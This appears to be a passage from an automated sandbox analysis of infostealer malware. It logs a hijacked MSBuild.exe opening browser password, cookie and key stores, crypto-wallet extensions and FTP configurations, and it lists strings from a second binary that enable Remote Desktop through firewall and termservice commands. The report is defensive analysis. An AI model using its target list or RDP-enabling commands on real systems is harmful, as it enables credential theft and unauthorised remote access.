Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: Af3hqfTjFh.exe Binary or memory string: WIN_81
Source: Af3hqfTjFh.exe Binary or memory string: WIN_XP
Source: Af3hqfTjFh.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Af3hqfTjFh.exe Binary or memory string: WIN_XPe
Source: Af3hqfTjFh.exe Binary or memory string: WIN_VISTA
Source: Af3hqfTjFh.exe Binary or memory string: WIN_7
Source: Af3hqfTjFh.exe Binary or memory string: WIN_8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.1569736725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc 